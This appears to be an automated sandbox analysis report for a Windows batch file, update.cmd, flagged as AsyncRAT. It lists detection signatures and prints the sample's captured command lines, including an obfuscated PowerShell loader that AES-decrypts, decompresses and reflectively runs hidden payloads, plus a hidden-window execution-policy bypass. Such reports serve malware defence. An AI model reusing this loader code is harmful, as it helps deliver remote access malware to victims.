Edit tour
Windows
Analysis Report
update.cmd
Overview
General Information
| Sample name: | update.cmd |
| Analysis ID: | 1446780 |
| MD5: | 981e0374ab07b58ea53823122fe91be7 |
| SHA1: | a162c8fac692cf34db330384f577f017fa003751 |
| SHA256: | 56b65c0c1e134f20968c3027a527f27722c11de4512460eabf0002e95e593e0d |
| Tags: | cmd |
| Infos: |   |
 | |
Detection
| Score: | 84 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Malicious sample detected (through community Yara rule)
Snort IDS alert for network traffic
Yara detected Powershell decode and execute
Bypasses PowerShell execution policy
Obfuscated command line found
Sigma detected: Suspicious PowerShell Parameter Substring
Suspicious powershell command line found
Uses dynamic DNS services
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Gzip Archive Decode Via PowerShell
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match
Classification
- System is w10x64
cmd.exe (PID: 2892 cmdline: C:\Windows \system32\ cmd.exe /c ""C:\User s\user\Des ktop\updat e.cmd" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - conhost.exe (PID: 2952 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) - cmd.exe (PID: 5568 cmdline:
cmd /c "se t __=^&rem " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) - cmd.exe (PID: 6252 cmdline:
C:\Windows \system32\ cmd.exe /S /D /c" ec ho functio n decrypt_ function($ param_var) { $aes_var =[System.S ecurity.Cr yptography .Aes]::Cre ate(); $ae s_var.Mode =[System.S ecurity.Cr yptography .CipherMod e]::CBC; $ aes_var.Pa dding=[Sys tem.Securi ty.Cryptog raphy.Padd ingMode]:: PKCS7; $ae s_var.Key= [System.Co nvert]::(' gnirtS46es aBmorF'[-1 ..-16] -jo in '')('cE oPe6dpwVu7 fDERkKynhF R/1EqmZQt/ n7wIxJrBC2 M='); $aes _var.IV=[S ystem.Conv ert]::('gn irtS46esaB morF'[-1.. -16] -join '')('UDOj bmgbocvvVy zcITNo4Q== '); $decry ptor_var=$ aes_var.Cr eateDecryp tor(); $re turn_var=$ decryptor_ var.Transf ormFinalBl ock($param _var, 0, $ param_var. Length); $ decryptor_ var.Dispos e(); $aes_ var.Dispos e(); $retu rn_var;}fu nction dec ompress_fu nction($pa ram_var){ $OQQuw=New -Object Sy stem.IO.Me moryStream (,$param_v ar); $eDfz X=New-Obje ct System. IO.MemoryS tream; $Pf txr=New-Ob ject Syste m.IO.Compr ession.GZi pStream($O QQuw, [IO. Compressio n.Compress ionMode]:: Decompress ); $Pftxr. CopyTo($eD fzX); $Pft xr.Dispose (); $OQQuw .Dispose() ; $eDfzX.D ispose(); $eDfzX.ToA rray();}fu nction exe cute_funct ion($param _var,$para m2_var){ $ umdfJ=[Sys tem.Reflec tion.Assem bly]::('da oL'[-1..-4 ] -join '' )([byte[]] $param_var ); $wCVTW= $umdfJ.Ent ryPoint; $ wCVTW.Invo ke($null, $param2_va r);}$yEoUp = 'C:\Use rs\user\De sktop\upda te.cmd';$h ost.UI.Raw UI.WindowT itle = $yE oUp;$BlEZh =[System.I O.File]::( 'txeTllAda eR'[-1..-1 1] -join ' ')($yEoUp) .Split([En vironment] ::NewLine) ;foreach ( $vQXry in $BlEZh) { if ($vQXry .StartsWit h('uuoNTGQ dmxGwoNrYA GxC')) { $ NjUsU=$vQX ry.Substri ng(20); br eak; }}$pa yloads_var =[string[] ]$NjUsU.Sp lit('\');$ payload1_v ar=decompr ess_functi on (decryp t_function ([Convert ]::('gnirt S46esaBmor F'[-1..-16 ] -join '' )($payload s_var[0].R eplace('#' , '/').Rep lace('@', 'A'))));$p ayload2_va r=decompre ss_functio n (decrypt _function ([Convert] ::('gnirtS 46esaBmorF '[-1..-16] -join '') ($payloads _var[1].Re place('#', '/').Repl ace('@', ' A'))));exe cute_funct ion $paylo ad1_var $n ull;execut e_function $payload2 _var (,[st ring[]] (' ')); " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE) 
powershell.exe (PID: 6136 cmdline: "C:\Window s\SysWOW64 \WindowsPo werShell\v 1.0\powers hell.exe" -noprofile -windowst yle hidden -ep bypas s MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
- cleanup
⊘No configs have been found
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| MALWARE_Win_AsyncRAT | Detects AsyncRAT | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_PowershellDecodeAndExecute | Yara detected Powershell decode and execute | Joe Security |
System Summary |   |
|---|
| Source: | Author: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): | ||
| Source: | Author: frack113: | ||
| Source: | Author: Hieu Tran: | ||